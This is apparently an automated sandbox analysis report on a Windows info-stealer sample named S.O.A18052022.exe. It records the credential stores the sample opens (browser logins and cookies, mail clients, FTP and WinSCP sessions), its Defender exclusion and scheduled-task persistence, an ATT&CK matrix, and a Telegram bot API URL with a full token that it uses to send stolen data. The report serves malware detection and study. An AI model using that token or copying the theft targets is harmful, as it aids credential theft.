                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Users\user\Desktop\S.O.A18052022.exe VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 1216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 6320, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40fb108.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.S.O.A18052022.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40fb108.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42e8fe0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40bf4e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42e8fe0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.280764938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.279240586.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 1216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 6320, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\Desktop\S.O.A18052022.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara matchFile source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 6320, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 1216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 6320, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40fb108.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.S.O.A18052022.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40fb108.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42e8fe0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.40bf4e8.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42e8fe0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.S.O.A18052022.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.S.O.A18052022.exe.42601c0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.280764938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.279240586.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 1216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: S.O.A18052022.exe PID: 6320, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Scheduled Task/Job
                    11
                    Process Injection
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Web Service
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API
                    Boot or Logon Initialization Scripts1
                    Scheduled Task/Job
                    1
                    Deobfuscate/Decode Files or Information
                    11
                    Input Capture
                    114
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job
                    Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    311
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    Automated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model11
                    Input Capture
                    Scheduled Transfer3
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets131
                    Virtualization/Sandbox Evasion
                    SSH1
                    Clipboard Data
                    Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common131
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Process Injection
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 626526 Sample: S.O.A18052022.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for dropped file 2->37 39 12 other signatures 2->39 7 S.O.A18052022.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\...\DIPrtjjfjUpyJ.exe, PE32 7->23 dropped 25 C:\...\DIPrtjjfjUpyJ.exe:Zone.Identifier, ASCII 7->25 dropped 27 C:\Users\user\AppData\Local\...\tmp7211.tmp, XML 7->27 dropped 29 C:\Users\user\...\S.O.A18052022.exe.log, ASCII 7->29 dropped 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->41 43 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->43 45 Uses schtasks.exe or at.exe to add and modify task schedules 7->45 47 Adds a directory exclusion to Windows Defender 7->47 11 S.O.A18052022.exe 15 6 7->11         started        15 powershell.exe 24 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 31 api.telegram.org 149.154.167.220, 443, 49739, 49741 TELEGRAMRU United Kingdom 11->31 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 55 2 other signatures 11->55 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    S.O.A18052022.exe50%VirustotalBrowse
                    S.O.A18052022.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe50%VirustotalBrowse
                    SourceDetectionScannerLabelLinkDownload
                    8.0.S.O.A18052022.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.S.O.A18052022.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.S.O.A18052022.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    8.2.S.O.A18052022.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.S.O.A18052022.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.S.O.A18052022.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://gQLZlB.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    https://cBg7jLh0ZH0on0CVQ4K.org0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    https://api.telegram.org40%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    https://api.telegram.orgD80%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.apache.org/licenses/LICENSE-2.0S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.orgS.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://gQLZlB.comS.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers?S.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwS.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.tiro.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.ipify.org%%startupfolder%S.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      low
                                      http://www.goodfont.co.krS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://api.telegram.org/bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/S.O.A18052022.exe, 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://www.carterandcone.comlS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cBg7jLh0ZH0on0CVQ4K.orgS.O.A18052022.exe, 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, S.O.A18052022.exe, 00000008.00000002.506594458.0000000002F7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/cTheS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org4S.O.A18052022.exe, 00000008.00000002.506527469.0000000002F6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlS.O.A18052022.exe, 00000000.00000002.288384512.0000000007102000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
